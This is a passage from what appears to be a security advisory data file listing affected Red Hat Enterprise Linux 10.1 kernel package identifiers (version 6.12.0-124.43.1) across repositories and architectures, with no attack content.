"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
